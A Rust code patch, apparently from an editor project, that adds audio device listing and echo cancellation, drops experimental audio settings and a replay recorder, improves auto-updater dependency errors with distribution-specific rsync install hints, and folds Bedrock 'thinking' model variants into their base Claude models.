+#[derive(Clone, Debug)]
+pub struct AudioDeviceInfo {
+ pub id: DeviceId,
+ pub desc: DeviceDescription,
+}
+
+impl AudioDeviceInfo {
+ pub fn matches_input(&self, is_input: bool) -> bool {
+ if is_input {
+ self.desc.supports_input()
+ } else {
+ self.desc.supports_output()
+ }
+ }
+
+ pub fn matches(&self, id: &DeviceId, is_input: bool) -> bool {
+ &self.id == id && self.matches_input(is_input)
+ }
+}
+
+impl std::fmt::Display for AudioDeviceInfo {
+ fn fmt(&self, f: &mut std::fmt::Formatter<'_>) -> std::fmt::Result {
+ write!(f, "{} ({})", self.desc.name(), self.id)
+ }
+}
+
+fn get_available_audio_devices() -> Vec<AudioDeviceInfo> {
+ let Some(devices) = default_host().devices().ok() else {
+ return Vec::new();
+ };
+ devices
+ .filter_map(|device| {
+ let id = device.id().ok()?;
+ let desc = device.description().ok()?;
+ Some(AudioDeviceInfo { id, desc })
+ })
+ .collect()
+}
+
+#[derive(Default, Clone, Debug)]
+pub struct AvailableAudioDevices(pub Vec<AudioDeviceInfo>);
+
+impl Global for AvailableAudioDevices {}
@@ -0,0 +1,54 @@
+#[cfg(not(any(all(target_os = "windows", target_env = "gnu"), target_os = "freebsd")))]
+mod real_implementation {
+ use anyhow::Context;
+ use libwebrtc::native::apm;
+ use parking_lot::Mutex;
+ use std::sync::Arc;
+
+ use crate::{CHANNEL_COUNT, SAMPLE_RATE};
+
+ #[derive(Clone)]
+ pub struct EchoCanceller(Arc<Mutex<apm::AudioProcessingModule>>);
+
+ impl Default for EchoCanceller {
+ fn default() -> Self {
+ Self(Arc::new(Mutex::new(apm::AudioProcessingModule::new(
+ true, false, false, false,
+ ))))
+ }
+ }
+
+ impl EchoCanceller {
+ pub fn process_reverse_stream(&mut self, buf: &mut [i16]) {
+ self.0
+ .lock()
+ .process_reverse_stream(buf, SAMPLE_RATE.get() as i32, CHANNEL_COUNT.get().into())
+ .expect("Audio input and output threads should not panic");
+ }
+
+ pub fn process_stream(&mut self, buf: &mut [i16]) -> anyhow::Result<()> {
+ self.0
+ .lock()
+ .process_stream(buf, SAMPLE_RATE.get() as i32, CHANNEL_COUNT.get() as i32)
+ .context("livekit audio processor error")
+ }
+ }
+}
+
+#[cfg(any(all(target_os = "windows", target_env = "gnu"), target_os = "freebsd"))]
+mod fake_implementation {
+ #[derive(Clone, Default)]
+ pub struct EchoCanceller;
+
+ impl EchoCanceller {
+ pub fn process_reverse_stream(&mut self, _buf: &mut [i16]) {}
+ pub fn process_stream(&mut self, _buf: &mut [i16]) -> anyhow::Result<()> {
+ Ok(())
+ }
+ }
+}
+
+#[cfg(any(all(target_os = "windows", target_env = "gnu"), target_os = "freebsd"))]
+pub use fake_implementation::EchoCanceller;
+#[cfg(not(any(all(target_os = "windows", target_env = "gnu"), target_os = "freebsd")))]
+pub use real_implementation::EchoCanceller;
@@ -9,12 +9,6 @@ use settings::{RegisterSetting, Settings, SettingsStore};
#[derive(Clone, Debug, RegisterSetting)]
pub struct AudioSettings {
- /// Opt into the new audio system.
- ///
- /// You need to rejoin a call for this setting to apply
- pub rodio_audio: bool, // default is false
- /// Requires 'rodio_audio: true'
- ///
/// Automatically increase or decrease you microphone's volume. This affects how
/// loud you sound to others.
///
@@ -23,25 +17,6 @@ pub struct AudioSettings {
/// audio and has auto speaker volume on this will make you very loud
/// compared to other speakers.
pub auto_microphone_volume: bool,
- /// Requires 'rodio_audio: true'
- ///
- /// Automatically increate or decrease the volume of other call members.
- /// This only affects how things sound for you.
- pub auto_speaker_volume: bool,
- /// Requires 'rodio_audio: true'
- ///
- /// Remove background noises. Works great for typing, cars, dogs, AC. Does
- /// not work well on music.
- pub denoise: bool,
- /// Requires 'rodio_audio: true'
- ///
- /// Use audio parameters compatible with the previous versions of
- /// experimental audio and non-experimental audio. When this is false you
- /// will sound strange to anyone not on the latest experimental audio. In
- /// the future we will migrate by setting this to false
- ///
- /// You need to rejoin a call for this setting to apply
- pub legacy_audio_compatible: bool,
/// Select specific output audio device.
pub output_audio_device: Option<DeviceId>,
/// Select specific input audio device.
@@ -53,11 +28,7 @@ impl Settings for AudioSettings {
fn from_settings(content: &settings::SettingsContent) -> Self {
let audio = &content.audio.as_ref().unwrap();
AudioSettings {
- rodio_audio: audio.rodio_audio.unwrap(),
auto_microphone_volume: audio.auto_microphone_volume.unwrap(),
- auto_speaker_volume: audio.auto_speaker_volume.unwrap(),
- denoise: audio.denoise.unwrap(),
- legacy_audio_compatible: audio.legacy_audio_compatible.unwrap(),
output_audio_device: audio
.output_audio_device
.as_ref()
@@ -71,10 +42,8 @@ impl Settings for AudioSettings {
}
/// See docs on [LIVE_SETTINGS]
-pub(crate) struct LiveSettings {
- pub(crate) auto_microphone_volume: AtomicBool,
- pub(crate) auto_speaker_volume: AtomicBool,
- pub(crate) denoise: AtomicBool,
+pub struct LiveSettings {
+ pub auto_microphone_volume: AtomicBool,
}
impl LiveSettings {
@@ -84,24 +53,6 @@ impl LiveSettings {
AudioSettings::get_global(cx).auto_microphone_volume,
Ordering::Relaxed,
);
- LIVE_SETTINGS.auto_speaker_volume.store(
- AudioSettings::get_global(cx).auto_speaker_volume,
- Ordering::Relaxed,
- );
-
- let denoise_enabled = AudioSettings::get_global(cx).denoise;
- #[cfg(debug_assertions)]
- {
- static DENOISE_WARNING_SEND: AtomicBool = AtomicBool::new(false);
- if denoise_enabled && !DENOISE_WARNING_SEND.load(Ordering::Relaxed) {
- DENOISE_WARNING_SEND.store(true, Ordering::Relaxed);
- log::warn!("Denoise does not work on debug builds, not enabling")
- }
- }
- #[cfg(not(debug_assertions))]
- LIVE_SETTINGS
- .denoise
- .store(denoise_enabled, Ordering::Relaxed);
})
.detach();
@@ -109,18 +60,6 @@ impl LiveSettings {
LIVE_SETTINGS
.auto_microphone_volume
.store(init_settings.auto_microphone_volume, Ordering::Relaxed);
- LIVE_SETTINGS
- .auto_speaker_volume
- .store(init_settings.auto_speaker_volume, Ordering::Relaxed);
- let denoise_enabled = AudioSettings::get_global(cx).denoise;
- #[cfg(debug_assertions)]
- if denoise_enabled {
- log::warn!("Denoise does not work on debug builds, not enabling")
- }
- #[cfg(not(debug_assertions))]
- LIVE_SETTINGS
- .denoise
- .store(denoise_enabled, Ordering::Relaxed);
}
}
@@ -128,8 +67,6 @@ impl LiveSettings {
/// observer of SettingsStore. Needed because audio playback and recording are
/// real time and must each run in a dedicated OS thread, therefore we can not
/// use the background executor.
-pub(crate) static LIVE_SETTINGS: LiveSettings = LiveSettings {
+pub static LIVE_SETTINGS: LiveSettings = LiveSettings {
auto_microphone_volume: AtomicBool::new(true),
- auto_speaker_volume: AtomicBool::new(true),
- denoise: AtomicBool::new(true),
};
@@ -1,77 +0,0 @@
-use anyhow::{Context, anyhow};
-use async_tar::{Builder, Header};
-use gpui::{BackgroundExecutor, Task};
-
-use collections::HashMap;
-use parking_lot::Mutex;
-use rodio::Source;
-use smol::fs::File;
-use std::{io, path::PathBuf, sync::Arc, time::Duration};
-
-use crate::{REPLAY_DURATION, rodio_ext::Replay};
-
-#[derive(Default, Clone)]
-pub(crate) struct Replays(Arc<Mutex<HashMap<String, Replay>>>);
-
-impl Replays {
- pub(crate) fn add_voip_stream(&self, stream_name: String, source: Replay) {
- let mut map = self.0.lock();
- map.retain(|_, replay| replay.source_is_active());
- map.insert(stream_name, source);
- }
-
- pub(crate) fn replays_to_tar(
- &self,
- executor: BackgroundExecutor,
- ) -> Task<anyhow::Result<(PathBuf, Duration)>> {
- let map = Arc::clone(&self.0);
- executor.spawn(async move {
- let recordings: Vec<_> = map
- .lock()
- .iter_mut()
- .map(|(name, replay)| {
- let queued = REPLAY_DURATION.min(replay.duration_ready());
- (name.clone(), replay.take_duration(queued).record())
- })
- .collect();
- let longest = recordings
- .iter()
- .map(|(_, r)| {
- r.total_duration()
- .expect("SamplesBuffer always returns a total duration")
- })
- .max()
- .ok_or(anyhow!("There is no audio to capture"))?;
-
- let path = std::env::current_dir()
- .context("Could not get current dir")?
- .join("replays.tar");
- let tar = File::create(&path)
- .await
- .context("Could not create file for tar")?;
-
- let mut tar = Builder::new(tar);
-
- for (name, recording) in recordings {
- let mut writer = io::Cursor::new(Vec::new());
- rodio::wav_to_writer(recording, &mut writer).context("failed to encode wav")?;
- let wav_data = writer.into_inner();
- let path = name.replace(' ', "_") + ".wav";
- let mut header = Header::new_gnu();
- // rw permissions for everyone
- header.set_mode(0o666);
- header.set_size(wav_data.len() as u64);
- tar.append_data(&mut header, path, wav_data.as_slice())
- .await
- .context("failed to apped wav to tar")?;
- }
- tar.into_inner()
- .await
- .context("Could not finish writing tar")?
- .sync_all()
- .await
- .context("Could not flush tar file to disk")?;
- Ok((path, longest))
- })
- }
-}
@@ -1,6 +1,6 @@
use anyhow::{Context as _, Result};
use client::Client;
-use db::kvp::KEY_VALUE_STORE;
+use db::kvp::KeyValueStore;
use futures_lite::StreamExt;
use gpui::{
App, AppContext as _, AsyncApp, BackgroundExecutor, Context, Entity, Global, Task, Window,
@@ -30,9 +30,64 @@ use util::command::new_command;
use workspace::Workspace;
const SHOULD_SHOW_UPDATE_NOTIFICATION_KEY: &str = "auto-updater-should-show-updated-notification";
+
+#[derive(Debug)]
+struct MissingDependencyError(String);
+
+impl std::fmt::Display for MissingDependencyError {
+ fn fmt(&self, f: &mut std::fmt::Formatter<'_>) -> std::fmt::Result {
+ write!(f, "{}", self.0)
+ }
+}
+
+impl std::error::Error for MissingDependencyError {}
const POLL_INTERVAL: Duration = Duration::from_secs(60 * 60);
const REMOTE_SERVER_CACHE_LIMIT: usize = 5;
+#[cfg(target_os = "linux")]
+fn linux_rsync_install_hint() -> &'static str {
+ let os_release = match std::fs::read_to_string("/etc/os-release") {
+ Ok(os_release) => os_release,
+ Err(_) => return "Please install rsync using your package manager",
+ };
+
+ let mut distribution_ids = Vec::new();
+ for line in os_release.lines() {
+ let trimmed = line.trim();
+ if let Some(value) = trimmed.strip_prefix("ID=") {
+ distribution_ids.push(value.trim_matches('"').to_ascii_lowercase());
+ } else if let Some(value) = trimmed.strip_prefix("ID_LIKE=") {
+ for id in value.trim_matches('"').split_whitespace() {
+ distribution_ids.push(id.to_ascii_lowercase());
+ }
+ }
+ }
+
+ let package_manager_hint = if distribution_ids
+ .iter()
+ .any(|distribution_id| distribution_id == "arch")
+ {
+ Some("Install it with: sudo pacman -S rsync")
+ } else if distribution_ids
+ .iter()
+ .any(|distribution_id| distribution_id == "debian" || distribution_id == "ubuntu")
+ {
+ Some("Install it with: sudo apt install rsync")
+ } else if distribution_ids.iter().any(|distribution_id| {
+ distribution_id == "fedora"
+ || distribution_id == "rhel"
+ || distribution_id == "centos"
+ || distribution_id == "rocky"
+ || distribution_id == "almalinux"
+ }) {
+ Some("Install it with: sudo dnf install rsync")
+ } else {
+ None
+ };
+
+ package_manager_hint.unwrap_or("Please install rsync using your package manager")
+}
+
actions!(
auto_update,
[
@@ -252,7 +307,9 @@ pub fn release_notes_url(cx: &mut App) -> Option<String> {
ReleaseChannel::Stable | ReleaseChannel::Preview => {
let auto_updater = AutoUpdater::get(cx)?;
let auto_updater = auto_updater.read(cx);
- let current_version = &auto_updater.current_version;
+ let mut current_version = auto_updater.current_version.clone();
+ current_version.pre = semver::Prerelease::EMPTY;
+ current_version.build = semver::BuildMetadata::EMPTY;
let release_channel = release_channel.dev_name();
let path = format!("/releases/{release_channel}/{current_version}");
auto_updater.client.http_client().build_url(&path)
@@ -395,7 +452,15 @@ impl AutoUpdater {
this.update(cx, |this, cx| {
this.pending_poll = None;
if let Err(error) = result {
+ let is_missing_dependency =
+ error.downcast_ref::<MissingDependencyError>().is_some();
this.status = match check_type {
+ UpdateCheckType::Automatic if is_missing_dependency => {
+ log::warn!("auto-update: {}", error);
+ AutoUpdateStatus::Errored {
+ error: Arc::new(error),
+ }
+ }
// Be quiet if the check was automated (e.g. when offline)
UpdateCheckType::Automatic => {
log::info!("auto-update check failed: error:{:?}", error);
@@ -627,9 +692,13 @@ impl AutoUpdater {
cx.notify();
});
- let installer_dir = InstallerDir::new().await?;
+ let installer_dir = InstallerDir::new()
+ .await
+ .context("Failed to create installer dir")?;
let target_path = Self::target_path(&installer_dir).await?;
- download_release(&target_path, fetched_release_data, client).await?;
+ download_release(&target_path, fetched_release_data, client)
+ .await
+ .with_context(|| format!("Failed to download update to {}", target_path.display()))?;
this.update(cx, |this, cx| {
this.status = AutoUpdateStatus::Installing {
@@ -638,7 +707,9 @@ impl AutoUpdater {
cx.notify();
});
- let new_binary_path = Self::install_release(installer_dir, target_path, cx).await?;
+ let new_binary_path = Self::install_release(installer_dir, &target_path, cx)
+ .await
+ .with_context(|| format!("Failed to install update at: {}", target_path.display()))?;
if let Some(new_binary_path) = new_binary_path {
cx.update(|cx| cx.set_restart_path(new_binary_path));
}
@@ -707,11 +778,21 @@ impl AutoUpdater {
}
fn check_dependencies() -> Result<()> {
- #[cfg(not(target_os = "windows"))]
+ #[cfg(target_os = "linux")]
+ if which::which("rsync").is_err() {
+ let install_hint = linux_rsync_install_hint();
+ return Err(MissingDependencyError(format!(
+ "rsync is required for auto-updates but is not installed. {install_hint}"
+ ))
+ .into());
+ }
+
+ #[cfg(target_os = "macos")]
anyhow::ensure!(
which::which("rsync").is_ok(),
"Could not auto-update because the required rsync utility was not found."
);
+
Ok(())
}
@@ -728,7 +809,7 @@ impl AutoUpdater {
async fn install_release(
installer_dir: InstallerDir,
- target_path: PathBuf,
+ target_path: &Path,
cx: &AsyncApp,
) -> Result<Option<PathBuf>> {
#[cfg(test)]
@@ -750,8 +831,8 @@ impl AutoUpdater {
fetched_version: Version,
) -> Result<Option<VersionCheckType>> {
// For non-nightly releases, ignore build and pre-release fields as they're not provided by our endpoints right now.
- installed_version.build = semver::BuildMetadata::EMPTY;
installed_version.pre = semver::Prerelease::EMPTY;
+ installed_version.build = semver::BuildMetadata::EMPTY;
let should_download = fetched_version > installed_version;
let newer_version = should_download.then(|| VersionCheckType::Semantic(fetched_version));
Ok(newer_version)
@@ -762,17 +843,16 @@ impl AutoUpdater {
should_show: bool,
cx: &App,
) -> Task<Result<()>> {
+ let kvp = KeyValueStore::global(cx);
cx.background_spawn(async move {
if should_show {
- KEY_VALUE_STORE
- .write_kvp(
- SHOULD_SHOW_UPDATE_NOTIFICATION_KEY.to_string(),
- "".to_string(),
- )
- .await?;
+ kvp.write_kvp(
+ SHOULD_SHOW_UPDATE_NOTIFICATION_KEY.to_string(),
+ "".to_string(),
+ )
+ .await?;
} else {
- KEY_VALUE_STORE
- .delete_kvp(SHOULD_SHOW_UPDATE_NOTIFICATION_KEY.to_string())
+ kvp.delete_kvp(SHOULD_SHOW_UPDATE_NOTIFICATION_KEY.to_string())
.await?;
}
Ok(())
@@ -780,10 +860,9 @@ impl AutoUpdater {
}
pub fn should_show_update_notification(&self, cx: &App) -> Task<Result<bool>> {
+ let kvp = KeyValueStore::global(cx);
cx.background_spawn(async move {
- Ok(KEY_VALUE_STORE
- .read_kvp(SHOULD_SHOW_UPDATE_NOTIFICATION_KEY)?
- .is_some())
+ Ok(kvp.read_kvp(SHOULD_SHOW_UPDATE_NOTIFICATION_KEY)?.is_some())
})
}
}
@@ -886,7 +965,7 @@ async fn download_release(
async fn install_release_linux(
temp_dir: &InstallerDir,
- downloaded_tar_gz: PathBuf,
+ downloaded_tar_gz: &Path,
cx: &AsyncApp,
) -> Result<Option<PathBuf>> {
let channel = cx.update(|cx| ReleaseChannel::global(cx).dev_name());
@@ -898,13 +977,15 @@ async fn install_release_linux(
.await
.context("failed to create directory into which to extract update")?;
- let output = new_command("tar")
- .arg("-xzf")
+ let mut cmd = new_command("tar");
+ cmd.arg("-xzf")
.arg(&downloaded_tar_gz)
.arg("-C")
- .arg(&extracted)
+ .arg(&extracted);
+ let output = cmd
.output()
- .await?;
+ .await
+ .with_context(|| "failed to extract: {cmd}")?;
anyhow::ensure!(
output.status.success(),
@@ -933,12 +1014,12 @@ async fn install_release_linux(
to = PathBuf::from(prefix);
}
- let output = new_command("rsync")
- .args(["-av", "--delete"])
- .arg(&from)
- .arg(&to)
+ let mut cmd = new_command("rsync");
+ cmd.args(["-av", "--delete"]).arg(&from).arg(&to);
+ let output = cmd
.output()
- .await?;
+ .await
+ .with_context(|| "failed to rsync: {cmd}")?;
anyhow::ensure!(
output.status.success(),
@@ -953,7 +1034,7 @@ async fn install_release_linux(
async fn install_release_macos(
temp_dir: &InstallerDir,
- downloaded_dmg: PathBuf,
+ downloaded_dmg: &Path,
cx: &AsyncApp,
) -> Result<Option<PathBuf>> {
let running_app_path = cx.update(|cx| cx.app_path())?;
@@ -965,13 +1046,15 @@ async fn install_release_macos(
let mut mounted_app_path: OsString = mount_path.join(running_app_filename).into();
mounted_app_path.push("/");
- let output = new_command("hdiutil")
- .args(["attach", "-nobrowse"])
+ let mut cmd = new_command("hdiutil");
+ cmd.args(["attach", "-nobrowse"])
.arg(&downloaded_dmg)
.arg("-mountroot")
- .arg(temp_dir.path())
+ .arg(temp_dir.path());
+ let output = cmd
.output()
- .await?;
+ .await
+ .with_context(|| "failed to mount: {cmd}")?;
anyhow::ensure!(
output.status.success(),
@@ -985,12 +1068,14 @@ async fn install_release_macos(
background_executor: cx.background_executor(),
};
- let output = new_command("rsync")
- .args(["-av", "--delete", "--exclude", "Icon?"])
+ let mut cmd = new_command("rsync");
+ cmd.args(["-av", "--delete", "--exclude", "Icon?"])
.arg(&mounted_app_path)
- .arg(&running_app_path)
+ .arg(&running_app_path);
+ let output = cmd
.output()
- .await?;
+ .await
+ .with_context(|| "failed to rsync: {cmd}")?;
anyhow::ensure!(
output.status.success(),
@@ -1015,14 +1100,13 @@ async fn cleanup_windows() -> Result<()> {
Ok(())
}
-async fn install_release_windows(downloaded_installer: PathBuf) -> Result<Option<PathBuf>> {
- let output = new_command(downloaded_installer)
- .arg("/verysilent")
+async fn install_release_windows(downloaded_installer: &Path) -> Result<Option<PathBuf>> {
+ let mut cmd = new_command(downloaded_installer);
+ cmd.arg("/verysilent")
.arg("/update=true")
.arg("!desktopicon")
- .arg("!quicklaunchicon")
- .output()
- .await?;
+ .arg("!quicklaunchicon");
+ let output = cmd.output().await?;
anyhow::ensure!(
output.status.success(),
"failed to start installer: {:?}",
@@ -1087,9 +1171,7 @@ mod tests {
use super::*;
- pub(super) struct InstallOverride(
- pub Rc<dyn Fn(PathBuf, &AsyncApp) -> Result<Option<PathBuf>>>,
- );
+ pub(super) struct InstallOverride(pub Rc<dyn Fn(&Path, &AsyncApp) -> Result<Option<PathBuf>>>);
impl Global for InstallOverride {}
#[gpui::test]
@@ -270,8 +270,8 @@ pub fn notify_if_app_was_updated(cx: &mut App) {
if should_show_notification {
cx.update(|cx| {
let mut version = updater.read(cx).current_version();
- version.build = semver::BuildMetadata::EMPTY;
version.pre = semver::Prerelease::EMPTY;
+ version.build = semver::BuildMetadata::EMPTY;
let app_name = ReleaseChannel::global(cx).display_name();
if let Some(content) = announcement_for_version(&version) {
@@ -48,49 +48,49 @@ pub enum Model {
// Anthropic Claude 4+ models
#[serde(rename = "claude-haiku-4-5", alias = "claude-haiku-4-5-latest")]
ClaudeHaiku4_5,
- #[serde(rename = "claude-sonnet-4", alias = "claude-sonnet-4-latest")]
- ClaudeSonnet4,
#[serde(
- rename = "claude-sonnet-4-thinking",
+ rename = "claude-sonnet-4",
+ alias = "claude-sonnet-4-latest",
+ alias = "claude-sonnet-4-thinking",
alias = "claude-sonnet-4-thinking-latest"
)]
- ClaudeSonnet4Thinking,
+ ClaudeSonnet4,
#[default]
- #[serde(rename = "claude-sonnet-4-5", alias = "claude-sonnet-4-5-latest")]
- ClaudeSonnet4_5,
#[serde(
- rename = "claude-sonnet-4-5-thinking",
+ rename = "claude-sonnet-4-5",
+ alias = "claude-sonnet-4-5-latest",
+ alias = "claude-sonnet-4-5-thinking",
alias = "claude-sonnet-4-5-thinking-latest"
)]
- ClaudeSonnet4_5Thinking,
- #[serde(rename = "claude-opus-4-1", alias = "claude-opus-4-1-latest")]
- ClaudeOpus4_1,
+ ClaudeSonnet4_5,
#[serde(
- rename = "claude-opus-4-1-thinking",
+ rename = "claude-opus-4-1",
+ alias = "claude-opus-4-1-latest",
+ alias = "claude-opus-4-1-thinking",
alias = "claude-opus-4-1-thinking-latest"
)]
- ClaudeOpus4_1Thinking,
- #[serde(rename = "claude-opus-4-5", alias = "claude-opus-4-5-latest")]
- ClaudeOpus4_5,
+ ClaudeOpus4_1,
#[serde(
- rename = "claude-opus-4-5-thinking",
+ rename = "claude-opus-4-5",
+ alias = "claude-opus-4-5-latest",
+ alias = "claude-opus-4-5-thinking",
alias = "claude-opus-4-5-thinking-latest"
)]
- ClaudeOpus4_5Thinking,
- #[serde(rename = "claude-opus-4-6", alias = "claude-opus-4-6-latest")]
- ClaudeOpus4_6,
+ ClaudeOpus4_5,
#[serde(
- rename = "claude-opus-4-6-thinking",
+ rename = "claude-opus-4-6",
+ alias = "claude-opus-4-6-latest",
+ alias = "claude-opus-4-6-thinking",
alias = "claude-opus-4-6-thinking-latest"
)]
- ClaudeOpus4_6Thinking,
- #[serde(rename = "claude-sonnet-4-6", alias = "claude-sonnet-4-6-latest")]
- ClaudeSonnet4_6,
+ ClaudeOpus4_6,
#[serde(
- rename = "claude-sonnet-4-6-thinking",
+ rename = "claude-sonnet-4-6",
+ alias = "claude-sonnet-4-6-latest",
+ alias = "claude-sonnet-4-6-thinking",
alias = "claude-sonnet-4-6-thinking-latest"
)]
- ClaudeSonnet4_6Thinking,
+ ClaudeSonnet4_6,
// Meta Llama 4 models
#[serde(rename = "llama-4-scout-17b")]
@@ -181,28 +181,16 @@ impl Model {
}
pub fn from_id(id: &str) -> anyhow::Result<Self> {
- if id.starts_with("claude-opus-4-6-thinking") {
- Ok(Self::ClaudeOpus4_6Thinking)
- } else if id.starts_with("claude-opus-4-6") {
+ if id.starts_with("claude-opus-4-6") {
Ok(Self::ClaudeOpus4_6)
- } else if id.starts_with("claude-opus-4-5-thinking") {
- Ok(Self::ClaudeOpus4_5Thinking)
} else if id.starts_with("claude-opus-4-5") {
Ok(Self::ClaudeOpus4_5)
- } else if id.starts_with("claude-opus-4-1-thinking") {
- Ok(Self::ClaudeOpus4_1Thinking)
} else if id.starts_with("claude-opus-4-1") {
Ok(Self::ClaudeOpus4_1)
- } else if id.starts_with("claude-sonnet-4-6-thinking") {
- Ok(Self::ClaudeSonnet4_6Thinking)
} else if id.starts_with("claude-sonnet-4-6") {
Ok(Self::ClaudeSonnet4_6)
- } else if id.starts_with("claude-sonnet-4-5-thinking") {
- Ok(Self::ClaudeSonnet4_5Thinking)
} else if id.starts_with("claude-sonnet-4-5") {
Ok(Self::ClaudeSonnet4_5)
- } else if id.starts_with("claude-sonnet-4-thinking") {
- Ok(Self::ClaudeSonnet4Thinking)
} else if id.starts_with("claude-sonnet-4") {
Ok(Self::ClaudeSonnet4)
} else if id.starts_with("claude-haiku-4-5") {
@@ -216,17 +204,11 @@ impl Model {
match self {
Self::ClaudeHaiku4_5 => "claude-haiku-4-5",
Self::ClaudeSonnet4 => "claude-sonnet-4",
- Self::ClaudeSonnet4Thinking => "claude-sonnet-4-thinking",
Self::ClaudeSonnet4_5 => "claude-sonnet-4-5",
- Self::ClaudeSonnet4_5Thinking => "claude-sonnet-4-5-thinking",
Self::ClaudeOpus4_1 => "claude-opus-4-1",
- Self::ClaudeOpus4_1Thinking => "claude-opus-4-1-thinking",
Self::ClaudeOpus4_5 => "claude-opus-4-5",
- Self::ClaudeOpus4_5Thinking => "claude-opus-4-5-thinking",
Self::ClaudeOpus4_6 => "claude-opus-4-6",
- Self::ClaudeOpus4_6Thinking => "claude-opus-4-6-thinking",
Self::ClaudeSonnet4_6 => "claude-sonnet-4-6",
- Self::ClaudeSonnet4_6Thinking => "claude-sonnet-4-6-thinking",
Self::Llama4Scout17B => "llama-4-scout-17b",
Self::Llama4Maverick17B => "llama-4-maverick-17b",
Self::Gemma3_4B => "gemma-3-4b",
@@ -261,20 +243,12 @@ impl Model {
pub fn request_id(&self) -> &str {
match self {
Self::ClaudeHaiku4_5 => "anthropic.claude-haiku-4-5-20251001-v1:0",
- Self::ClaudeSonnet4 | Self::ClaudeSonnet4Thinking => {
- "anthropic.claude-sonnet-4-20250514-v1:0"
- }
- Self::ClaudeSonnet4_5 | Self::ClaudeSonnet4_5Thinking => {
- "anthropic.claude-sonnet-4-5-20250929-v1:0"
- }
- Self::ClaudeOpus4_1 | Self::ClaudeOpus4_1Thinking => {
- "anthropic.claude-opus-4-1-20250805-v1:0"
- }
- Self::ClaudeOpus4_5 | Self::ClaudeOpus4_5Thinking => {
- "anthropic.claude-opus-4-5-20251101-v1:0"
- }
- Self::ClaudeOpus4_6 | Self::ClaudeOpus4_6Thinking => "anthropic.claude-opus-4-6-v1",
- Self::ClaudeSonnet4_6 | Self::ClaudeSonnet4_6Thinking => "anthropic.claude-sonnet-4-6",
+ Self::ClaudeSonnet4 => "anthropic.claude-sonnet-4-20250514-v1:0",
+ Self::ClaudeSonnet4_5 => "anthropic.claude-sonnet-4-5-20250929-v1:0",
+ Self::ClaudeOpus4_1 => "anthropic.claude-opus-4-1-20250805-v1:0",
+ Self::ClaudeOpus4_5 => "anthropic.claude-opus-4-5-20251101-v1:0",
+ Self::ClaudeOpus4_6 => "anthropic.claude-opus-4-6-v1",
+ Self::ClaudeSonnet4_6 => "anthropic.claude-sonnet-4-6",
Self::Llama4Scout17B => "meta.llama4-scout-17b-instruct-v1:0",
Self::Llama4Maverick17B => "meta.llama4-maverick-17b-instruct-v1:0",
Self::Gemma3_4B => "google.gemma-3-4b-it",
@@ -310,17 +284,11 @@ impl Model {
match self {
Self::ClaudeHaiku4_5 => "Claude Haiku 4.5",
Self::ClaudeSonnet4 => "Claude Sonnet 4",
- Self::ClaudeSonnet4Thinking => "Claude Sonnet 4 Thinking",
Self::ClaudeSonnet4_5 => "Claude Sonnet 4.5",
- Self::ClaudeSonnet4_5Thinking => "Claude Sonnet 4.5 Thinking",
Self::ClaudeOpus4_1 => "Claude Opus 4.1",
- Self::ClaudeOpus4_1Thinking => "Claude Opus 4.1 Thinking",
Self::ClaudeOpus4_5 => "Claude Opus 4.5",
- Self::ClaudeOpus4_5Thinking => "Claude Opus 4.5 Thinking",
Self::ClaudeOpus4_6 => "Claude Opus 4.6",
- Self::ClaudeOpus4_6Thinking => "Claude Opus 4.6 Thinking",
Self::ClaudeSonnet4_6 => "Claude Sonnet 4.6",
- Self::ClaudeSonnet4_6Thinking => "Claude Sonnet 4.6 Thinking",
Self::Llama4Scout17B => "Llama 4 Scout 17B",
Self::Llama4Maverick17B => "Llama 4 Maverick 17B",
Self::Gemma3_4B => "Gemma 3 4B",
@@ -362,17 +330,11 @@ impl Model {
match self {
Self::ClaudeHaiku4_5
| Self::ClaudeSonnet4
- | Self::ClaudeSonnet4Thinking
| Self::ClaudeSonnet4_5
- | Self::ClaudeSonnet4_5Thinking
| Self::ClaudeOpus4_1
- | Self::ClaudeOpus4_1Thinking
| Self::ClaudeOpus4_5
- | Self::ClaudeOpus4_5Thinking
| Self::ClaudeOpus4_6
- | Self::ClaudeOpus4_6Thinking
- | Self::ClaudeSonnet4_6
- | Self::ClaudeSonnet4_6Thinking => 200_000,
+ | Self::ClaudeSonnet4_6 => 200_000,
Self::Llama4Scout17B | Self::Llama4Maverick17B => 128_000,
Self::Gemma3_4B | Self::Gemma3_12B | Self::Gemma3_27B => 128_000,
Self::MagistralSmall | Self::MistralLarge3 | Self::PixtralLarge => 128_000,
@@ -397,15 +359,12 @@ impl Model {
pub fn max_output_tokens(&self) -> u64 {
match self {
Self::ClaudeHaiku4_5
+ | Self::ClaudeSonnet4
| Self::ClaudeSonnet4_5
- | Self::ClaudeSonnet4_5Thinking
| Self::ClaudeOpus4_5
- | Self::ClaudeOpus4_5Thinking
- | Self::ClaudeSonnet4_6
- | Self::ClaudeSonnet4_6Thinking => 64_000,
- Self::ClaudeSonnet4 | Self::ClaudeSonnet4Thinking => 64_000,
- Self::ClaudeOpus4_1 | Self::ClaudeOpus4_1Thinking => 32_000,
- Self::ClaudeOpus4_6 | Self::ClaudeOpus4_6Thinking => 128_000,
+ | Self::ClaudeSonnet4_6 => 64_000,
+ Self::ClaudeOpus4_1 => 32_000,
+ Self::ClaudeOpus4_6 => 128_000,
Self::Llama4Scout17B
| Self::Llama4Maverick17B
| Self::Gemma3_4B
@@ -436,17 +395,11 @@ impl Model {
match self {
Self::ClaudeHaiku4_5
| Self::ClaudeSonnet4
- | Self::ClaudeSonnet4Thinking
| Self::ClaudeSonnet4_5
- | Self::ClaudeSonnet4_5Thinking
| Self::ClaudeOpus4_1
- | Self::ClaudeOpus4_1Thinking
| Self::ClaudeOpus4_5
- | Self::ClaudeOpus4_5Thinking
| Self::ClaudeOpus4_6
- | Self::ClaudeOpus4_6Thinking
- | Self::ClaudeSonnet4_6
- | Self::ClaudeSonnet4_6Thinking => 1.0,
+ | Self::ClaudeSonnet4_6 => 1.0,
Self::Custom {
default_temperature,
..
@@ -459,17 +412,11 @@ impl Model {
match self {
Self::ClaudeHaiku4_5
| Self::ClaudeSonnet4
- | Self::ClaudeSonnet4Thinking
| Self::ClaudeSonnet4_5
- | Self::ClaudeSonnet4_5Thinking
| Self::ClaudeOpus4_1
- | Self::ClaudeOpus4_1Thinking
| Self::ClaudeOpus4_5
- | Self::ClaudeOpus4_5Thinking
| Self::ClaudeOpus4_6
- | Self::ClaudeOpus4_6Thinking
- | Self::ClaudeSonnet4_6
- | Self::ClaudeSonnet4_6Thinking => true,
+ | Self::ClaudeSonnet4_6 => true,
